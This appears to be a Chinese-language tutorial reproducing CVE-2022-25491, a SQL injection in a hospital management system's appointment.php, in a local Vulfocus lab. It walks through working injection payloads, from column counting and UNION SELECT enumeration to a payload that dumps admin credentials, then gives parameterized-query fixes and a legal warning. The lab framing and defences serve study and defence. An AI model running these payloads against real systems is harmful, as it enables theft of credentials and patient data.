1. 漏洞背景HMS系统与CVE-2022-25491医院管理系统HMS是医疗行业的核心信息化平台它整合了患者挂号、医生排班、药品库存等关键数据。这类系统一旦出现安全漏洞可能导致患者隐私泄露甚至医疗事故。CVE-2022-25491正是这样一个高危漏洞——通过appointment.php文件的editid参数攻击者可以实施完整的SQL注入攻击。我在实际测试中发现这个漏洞的特别之处在于它存在于医疗系统的预约模块。当患者通过网页修改预约记录时系统未对editid参数做任何过滤直接拼接到SQL语句中。这就好比医院把病历本随意放在走廊任何人都能随意涂改。2. 环境搭建与漏洞定位2.1 快速搭建复现环境推荐使用Vulfocus漏洞靶场这是我测试过最接近真实医疗系统的模拟环境。具体操作步骤如下docker pull vulfocus/hms-cve-2022-25491 docker run -d -p 8080:80 vulfocus/hms-cve-2022-25491启动后访问http://localhost:8080/appointment.php就能看到预约界面。这里有个细节要注意初次访问时页面看似正常只有添加editid参数才会触发漏洞比如尝试访问http://localhost:8080/appointment.php?editid12.2 漏洞参数定位通过分析CVE描述和代码审计可以确认漏洞点在editid参数。但直接输入数字可能看不到明显反应这里有个小技巧在参数值后面添加单引号。比如http://localhost:8080/appointment.php?editid1如果页面返回数据库错误信息比如MySQL的语法错误就确认存在SQL注入漏洞。我在测试时发现这个系统会返回完整的SQL错误这对攻击者来说简直是贴心的调试信息。3. 手工注入实战全流程3.1 闭合方式判断先测试单引号闭合1-- # 正常显示 → 单引号闭合 1 # 报错 → 确认闭合方式这里解释下--的作用它是SQL注释符号相当于告诉数据库后面的内容不用执行。加号在URL中代表空格这样能确保注释生效。这个技巧在绕过WAF时特别有用。3.2 字段数探测通过order by子句判断字段数?editid1 order by 10-- # 正常 ?editid1 order by 11-- # 报错 → 共10个字段我遇到过有的系统在字段数判断时会卡住这时候可以用二分法快速定位。比如先试order by 20如果报错就试10逐步缩小范围。3.3 联合查询获取信息确定回显位页面显示数据的位置?editid0 union select 1,2,3,4,5,6,7,8,9,10--当看到页面显示数字2、4、5时说明这些位置可以输出我们注入的数据。接下来就能玩真的了获取数据库版本和当前用户?editid0 union select 1,version(),3,database(),user(),6,7,8,9,10--3.4 数据提取实战技巧获取所有表名重点观察user/admin/doctor表?editid0 union select 1,2,3,4,5,6,7,8,9, group_concat(table_name) from information_schema.tables where table_schemadatabase()--提取admin表字段时有个坑不同医院的HMS字段名可能不同。我遇到过有的系统用username有的是login_name。这时候要灵活调整?editid0 union select 1,2,3,4,5,6,7,8,9, group_concat(column_name) from information_schema.columns where table_nameadmin--最终获取管理员凭证的payload?editid0 union select 1,2,3,4,5,6,7,8,9, group_concat(adminname,0x3a,password) from admin--0x3a是冒号的十六进制用于分隔用户名和密码4. 漏洞原理与防御建议4.1 漏洞深度分析这个漏洞的根源在于字符串拼接$sql SELECT * FROM appointments WHERE id$_GET[editid];开发人员直接使用了用户输入的参数没有进行任何过滤。更可怕的是系统配置了错误回显使得攻击者能轻松获取数据库信息。在实际医疗系统中这类数据可能包含患者病史、检验结果等敏感信息。4.2 企业级防护方案对于医疗系统开发者我建议采用多层防御预处理语句PHP示例$stmt $conn-prepare(SELECT * FROM appointments WHERE id?); $stmt-bind_param(s, $_GET[editid]);最小权限原则数据库账户只赋予必要权限错误处理关闭详细错误回显自定义错误页面我在给某三甲医院做安全评估时发现他们旧版HMS存在类似漏洞。升级后采用ORM框架参数化查询再配合定期安全扫描至今未再出现SQL注入问题。5. 法律与伦理警示必须强调未经授权的漏洞测试属于违法行为。我在复现这个漏洞时全程使用的是本地搭建的Vulfocus环境。真实医疗系统关系到患者生命安全任何安全研究都应在法律框架内进行。建议通过漏洞众测平台与医疗机构合作以合法方式提升系统安全性。